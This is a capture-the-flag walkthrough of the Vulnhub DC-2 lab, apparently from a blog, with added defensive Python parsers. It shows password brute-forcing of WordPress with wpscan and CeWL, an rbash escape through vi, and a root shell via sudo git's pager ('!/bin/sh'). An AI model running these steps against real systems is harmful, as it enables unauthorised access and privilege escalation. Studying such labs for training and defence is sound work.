
【Vulnhub】— DC-2

Host discovery

As usual, netdiscover.

The target's IP is 192.168.234.177.

Port scanning

Using Nmap: nmap -Pn -A 192.168.234.177

root@kali:~# nmap -Pn -A 192.168.234.177
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-05 23:36 CST
Nmap scan report for 192.168.234.177
Host is up (0.00042s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:23:FE:58 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.234.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.77 seconds

We can see the target has port 80 open, so let's browse straight to the IP.

It can't be reached: the server answers with a redirect to http://dc-2/.

Here we need to edit the hosts file so that the name resolves locally.

hosts file location: C:\Windows\System32\drivers\etc\hosts (on Linux: /etc/hosts)

Add a line of the form IP + [space] + domain, e.g. 192.168.234.177 dc-2

Now the site loads: it is a WordPress site.

Flag1

Flag1 is right on the site's home page.

Flag1 tells us to use the tool CeWL, a wordlist generator shipped with Kali Linux.

Flag2

Using CeWL

Let's look at CeWL's usage:

root@kali:~# cewl -h
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Usage: cewl [OPTIONS] ... <url>

    OPTIONS:
	-h, --help: Show help.
	-k, --keep: Keep the downloaded file.
	-d <x>,--depth <x>: Depth to spider to, default 2.
	-m, --min_word_length: Minimum word length, default 3.
	-o, --offsite: Let the spider visit other sites.
	--exclude: A file containing a list of paths to exclude
	-w, --write: Write the output to the file.
	-u, --ua <agent>: User agent to send.
	-n, --no-words: Don't output the wordlist.
	--with-numbers: Accept words with numbers in as well as just letters
	-a, --meta: include meta data.
	--meta_file file: Output file for meta data.
	-e, --email: Include email addresses.
	--email_file <file>: Output file for email addresses.
	--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
	-c, --count: Show the count for each word found.
	-v, --verbose: Verbose.
	--debug: Extra debug information.
      
	Authentication
	--auth_type: Digest or basic.
	--auth_user: Authentication username.
	--auth_pass: Authentication password.
      
	Proxy Support
	--proxy_host: Proxy host.
	--proxy_port: Proxy port, default 8080.
	--proxy_username: Username for proxy, if required.
	--proxy_password: Password for proxy, if required.
      
	Headers
	--header, -H: In format name:value - can pass multiple.
      
    <url>: The site to spider.

CeWL is a Ruby application: you give its spider a URL and a crawl depth, optionally let it follow offsite links, and it returns a wordlist that you can feed to a password cracker such as John the Ripper. CeWL is used from the command line.

Run cewl -v http://dc-2/ -w dict.txt to spider the site and save the generated wordlist as dict.txt in the current directory.
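What CeWL does under the hood is simple enough to show in a few lines. The Python below is an added example, not part of the original post and not CeWL's own code: it extracts the visible words of a constructed HTML page (skipping script and style bodies, honouring a minimum word length and a --with-numbers switch), and then, from the defender's side, checks whether candidate passwords are plain words visible on the site. The sample page and the candidate list are constructed for the example; the two passwords recovered later in this walkthrough, adipiscing and parturient, are ordinary Lorem ipsum words, which is exactly why a site-derived wordlist works against this box.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not fetched from DC-2): a WordPress-style front page whose
# placeholder text is Lorem ipsum, so "adipiscing" and "parturient" appear as plain words.
SAMPLE_HTML = """
<html><head><title>DC-2 &#8211; Just another WordPress site</title>
<script>var wpAjax = {"url": "/wp-admin/admin-ajax.php"};</script>
<style>.hidden { display: none; }</style></head>
<body>
<h1>Welcome</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam parturient
montes, nascetur ridiculus mus. Donec quam felis, ultricies nec 2020.</p>
<p>Contact: admin@dc-2.local for details. Flag 1 hint: use cewl.</p>
</body></html>
"""


class TextExtractor(HTMLParser):
    """Collect visible text only; <script> and <style> bodies are not words a user sees."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def site_words(html, min_word_length=3, with_numbers=False):
    """Unique words of one page in first-seen order (the equivalent of cewl -m / --with-numbers)."""
    parser = TextExtractor()
    parser.feed(html)
    text = " ".join(parser.parts)
    pattern = r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+"
    seen, words = set(), []
    for word in re.findall(pattern, text):
        if len(word) >= min_word_length and word not in seen:
            seen.add(word)
            words.append(word)
    return words


def words_in_site_content(candidates, html, **kw):
    """Defender check: which candidate passwords are plain words visible on the site?"""
    words = {w.lower() for w in site_words(html, **kw)}
    return [c for c in candidates if c.lower() in words]


if __name__ == "__main__":
    for w in site_words(SAMPLE_HTML):
        print(w)
    print(words_in_site_content(["adipiscing", "parturient", "Tr0ub4dor&3"], SAMPLE_HTML))
```

A real crawl follows links to the configured depth and merges the per-page lists; the password check is the part worth keeping on the defensive side, as a rule in a password policy that rejects any password found in the organisation's own public content.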

Detailed CeWL usage

Looking at the generated wordlist:

Next I started brute-forcing. I assumed admin would be the account, but that got nowhere. Since this is a WordPress site, we can use wpscan to enumerate its users.

Using wpscan

wpscan --url http://dc-2/ --enumerate u enumerates the WordPress users and finds three:

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
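The wpscan output above is worth reading for what it says about the site, not just for the three names: each "Found By" / "Confirmed By" line is a separate channel through which WordPress leaked a username. The Python below is an added example, not part of the original post and not wpscan's own code; it parses the user-enumeration block reproduced from the page and reports which channels leaked how many names, which is what a site owner would want to close (the public /wp-json/wp/v2/users endpoint, author-ID archive redirects, and login error messages that differ for valid and invalid usernames).

```python
import re

# The user-enumeration block from the wpscan run against DC-2, reproduced from the page.
WPSCAN_USERS = """\
[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
"""

# "<method> (Passive|Aggressive Detection)" as wpscan prints it
METHOD_RE = re.compile(r"^(.*?) \((Passive|Aggressive) Detection\)$")


def parse_wpscan_users(text):
    """Map each username to the list of (method, mode) pairs that revealed it."""
    users, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[+] "):
            current = line[4:].strip()
            users[current] = []
            continue
        if current is None or not line.startswith("|"):
            continue
        body = line.lstrip("| ").strip()
        for prefix in ("Found By:", "Confirmed By:"):
            if body.startswith(prefix):
                body = body[len(prefix):].strip()
        m = METHOD_RE.match(body)
        if m:  # URL lines ("- http://...") and bare "Confirmed By:" lines do not match
            users[current].append((m.group(1), m.group(2)))
    return users


def leak_channels(users):
    """Defender view: which enumeration methods leaked at least one username, and how many."""
    counts = {}
    for methods in users.values():
        for method, _mode in methods:
            counts[method] = counts.get(method, 0) + 1
    return dict(sorted(counts.items(), key=lambda kv: -kv[1]))


if __name__ == "__main__":
    found = parse_wpscan_users(WPSCAN_USERS)
    for user, methods in found.items():
        print(user, [m for m, _ in methods])
    print(leak_channels(found))
```

Passive methods (here the RSS generator) need no probing at all, so they are the first to fix; the aggressive ones show up in the web server log as bursts of requests to wp-json/wp/v2/users, ?author=N and wp-login.php, which is a usable detection signature for this kind of enumeration.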

Two other commonly used options:

wpscan --url http://dc-2/ --enumerate vp scans for vulnerable plugins

wpscan --url http://dc-2/ --enumerate vt scans for vulnerable themes

Cracking passwords with wpscan

wpscan --url http://dc-2/ --passwords /root/dict.txt --usernames admin,jerry,tom

For wpscan usage, run wpscan --hh to see every option; wpscan is updated regularly, so online tutorials may no longer match.

In the end, two passwords work:

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

Flag2 is in one of jerry's posts:

Flag3

If you can't exploit WordPress and take a shortcut, there is another way. Hope you found another entry point.

In other words, we need a different approach rather than going through WordPress alone. Looking back at the scan, only port 80 was open, which felt wrong; some ports must be hidden, so I ran Nmap again over the full port range.

root@kali:~# nmap -sV -Pn -p 1-65535 192.168.234.177 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-07 14:00 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.177
Host is up (0.00053s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: WordPress version: 2 
|   /wp-includes/images/rss.png: WordPress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: WordPress version 2.5 found.
|   /wp-includes/images/blank.gif: WordPress version 2.6 found.
|   /wp-includes/js/comment-reply.js: WordPress version 2.7 found.
|   /wp-login.php: WordPress login page.
|   /wp-admin/upgrade.php: WordPress login page.
|_  /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.10 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users: 
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_https-redirect: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.10: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2016-2161	5.0	https://vulners.com/cve/CVE-2016-2161
|     	CVE-2016-0736	5.0	https://vulners.com/cve/CVE-2016-0736
|     	CVE-2014-3583	5.0	https://vulners.com/cve/CVE-2014-3583
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2015-3185	4.3	https://vulners.com/cve/CVE-2015-3185
|     	CVE-2014-8109	4.3	https://vulners.com/cve/CVE-2014-8109
|     	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
|_    	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:23:FE:58 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.85 seconds
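The first scan missed SSH because, without -p, Nmap only probes its 1,000 most common TCP ports and 7744 is not among them; the lesson for anyone scanning their own estate is to compare a quick scan against a full one. The Python below is an added example, not part of the original post and not Nmap's own code: it parses excerpts of the two scans above (trimmed to the port and vulners lines), reports the open ports that only the full sweep found, and pulls the vulners CVEs at or above a CVSS threshold for triage.

```python
import re

# Excerpts of the two Nmap runs from the page: the default scan (top 1,000 ports)
# and the full 1-65535 scan with --script=vuln. Trimmed to the lines the parser needs.
SCAN_DEFAULT = """\
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
"""

SCAN_FULL = """\
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
| vulners:
|   cpe:/a:apache:http_server:2.4.10:
|     \tCVE-2017-7679\t7.5\thttps://vulners.com/cve/CVE-2017-7679
|     \tCVE-2017-7668\t7.5\thttps://vulners.com/cve/CVE-2017-7668
|     \tCVE-2018-1312\t6.8\thttps://vulners.com/cve/CVE-2018-1312
|     \tCVE-2016-8743\t5.0\thttps://vulners.com/cve/CVE-2016-8743
|_    \tCVE-2016-8612\t3.3\thttps://vulners.com/cve/CVE-2016-8612
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
"""

# "80/tcp open  http    Apache httpd 2.4.10 ((Debian))"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# vulners rows: "|<optional _><spaces/tab>CVE-id<tab>score<tab>url"
CVE_RE = re.compile(r"^\|_?\s*(CVE-\d{4}-\d+)\t([\d.]+)\t")


def parse_nmap(text):
    """Return {port: {'proto', 'state', 'service', 'version', 'cves': [(id, cvss)]}}."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = ports[int(m.group(1))] = {
                "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "cves": [],
            }
            continue
        c = CVE_RE.match(line)
        if c and current is not None:  # vulners rows belong to the last port seen
            current["cves"].append((c.group(1), float(c.group(2))))
    return ports


def new_open_ports(quick, full):
    """Open ports the full sweep found that the default scan did not report."""
    q = {p for p, d in parse_nmap(quick).items() if d["state"] == "open"}
    f = {p for p, d in parse_nmap(full).items() if d["state"] == "open"}
    return sorted(f - q)


def high_cves(text, threshold=7.0):
    """(port, cve, cvss) triples at or above the CVSS threshold, worst first."""
    hits = [(p, cid, s) for p, d in parse_nmap(text).items()
            for cid, s in d["cves"] if s >= threshold]
    return sorted(hits, key=lambda t: -t[2])


if __name__ == "__main__":
    print("only in full scan:", new_open_ports(SCAN_DEFAULT, SCAN_FULL))
    for port, cve, score in high_cves(SCAN_FULL):
        print(port, cve, score)
```

For real use, feed both functions the output of nmap -oN files rather than pasted text; a service on a non-standard port, as here, is exactly the thing an inventory built from quick scans never sees.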

We can see port 7744 is open and it is an SSH service. Connect with ssh on that port as tom, using the password recovered above:

Connected.

Running ls in the home directory shows flag3.

Trying to read flag3.txt with cat fails:

tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

What is rbash?

A restricted shell (rbash) is bash started in a mode that switches off some of its features, as the name suggests: the user cannot change directory, cannot set or unset PATH or SHELL, cannot run commands whose names contain a slash, and cannot redirect output. It limits which commands and scripts can be run, giving the bash shell on Linux an extra layer of protection.

Here vim is unavailable under rbash but vi is not, so I opened the file with vi and got flag3:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

Perhaps we need jerry's account to escalate privileges.

Then I tried logging in with the cracked jerry credentials, but it didn't work...

So I went back to tom and tried switching users, only to find that in this shell practically nothing can be run.

Bypassing rbash

Using vi

vi
:set shell=/bin/bash       // press Enter after typing this, then type the next line
:shell                     // press Enter again
...... at this point vi has dropped us back to a command prompt; now type
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL
Bypass successful.

Flag4

Now we can run any command:

tom@DC-2:/$ cd home
tom@DC-2:/home$ ls
jerry  tom
tom@DC-2:/home$ cd jerry
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

 

Flag5

Flag4 hints that git is the way to escalate privileges.

Check the user's sudo rights with sudo -l.

tom doesn't have that permission, so switch to jerry.

Using the cracked jerry credentials, switch to the jerry user.

Run sudo -l again:

tom@DC-2:/home/jerry$ su jerry
Password: 
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

What this means: jerry may run git as root (the "(root)" part) without entering a password (NOPASSWD).

jerry@DC-2:~$ sudo git -p
usage: git [--version] [--help] [-C <path>] [-c name=value]
           [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
           [-p|--paginate|--no-pager] [--no-replace-objects] [--bare]
           [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
           <command> [<args>]

The most commonly used git commands are:
   add        Add file contents to the index
   bisect     Find by binary search the change that introduced a bug
   branch     List, create, or delete branches
   checkout   Checkout a branch or paths to the working tree
   clone      Clone a repository into a new directory
   commit     Record changes to the repository
   diff       Show changes between commits, commit and working tree, etc
   fetch      Download objects and refs from another repository
   grep       Print lines matching a pattern
   init       Create an empty Git repository or reinitialize an existing one
   log        Show commit logs
   merge      Join two or more development histories together
   mv         Move or rename a file, a directory, or a symlink
   pull       Fetch from and integrate with another repository or a local branch
   push       Update remote refs along with associated objects
   rebase     Forward-port local commits to the updated upstream head
   reset      Reset current HEAD to the specified state
   rm         Remove files from the working tree and from the index
   show       Show various types of objects
   status     Show the working tree status
   tag        Create, list, delete or verify a tag object signed with GPG
   
   'git help -a' and 'git help -g' lists available subcommands and some
concept guides. See 'git help <command>' or 'git help <concept>'
to read about a specific subcommand or concept.
!/bin/sh      // spawn an interactive shell from the pager
# whoami
root
# cd /root
# ls
final-flag.txt
# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

# 


git -p simply means: show git's help through a pager. Because git runs under sudo, the pager it starts (less) runs as root too, and less lets you run a command with !, so !/bin/sh hands back a root shell.
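Both escalation steps on this box, the vi escape from rbash and the sudo NOPASSWD rule for git, have the same root cause: a program the user is allowed to run can start another program (a shell from vi, a pager from git) that inherits its privileges. The Python below is an added example, not part of the original post and not a tool the box ships; it parses the sudo -l output shown above and flags NOPASSWD rules for programs with a known shell escape, and does the same check for the command set of an rbash user. The escape list contains only what this walkthrough demonstrates (vi/vim and git); the rbash command lists in the test are constructed.

```python
import re

# sudo -l output for jerry on DC-2, reproduced from the page (raw string keeps the "\:" as printed).
SUDO_L_JERRY = r"""
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""

# Programs seen on this box that can hand the user an unrestricted shell, and why.
# Limited to what the walkthrough itself shows: an editor's :shell, and git's pager.
SHELL_ESCAPES = {
    "vi": "editor: ':set shell=/bin/bash' then ':shell'",
    "vim": "editor: ':set shell=/bin/bash' then ':shell'",
    "git": "pager: 'git -p' pipes output through less, where '!' runs a command",
}

# "    (root) NOPASSWD: /usr/bin/git"  ->  runas, tag list, comma-separated commands
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_rules(text):
    """Parse the 'may run the following commands' section of sudo -l output."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip(": ") for t in m.group("tags").split() if t.strip(": ")]
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": cmd.strip()})
    return rules


def risky_sudo_rules(text):
    """Rules that let the user run a shell-escape-capable program (or ALL) without a password."""
    out = []
    for r in parse_sudo_rules(text):
        name = "ALL" if r["cmd"] == "ALL" else r["cmd"].rsplit("/", 1)[-1].split()[0]
        if "NOPASSWD" in r["tags"] and (name == "ALL" or name in SHELL_ESCAPES):
            out.append((r["cmd"], SHELL_ESCAPES.get(name, "unrestricted")))
    return out


def risky_restricted_commands(allowed):
    """For an rbash user, which commands placed in their PATH defeat the restriction."""
    return {c: SHELL_ESCAPES[c] for c in allowed if c in SHELL_ESCAPES}


if __name__ == "__main__":
    for cmd, why in risky_sudo_rules(SUDO_L_JERRY):
        print("sudo:", cmd, "->", why)
    print("rbash:", risky_restricted_commands(["ls", "cat", "vi"]))
```

The fixes follow from the findings: an rbash user's PATH directory should contain only the commands they need and no editor or pager, and sudoers should not grant NOPASSWD on git at all; if a privileged git operation is genuinely needed, the rule should name the exact command line (sudoers matches arguments) rather than the bare binary.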

 

 

Source: HackerGu's Blog » 【Vulnhub】— DC-2 (no reproduction without permission)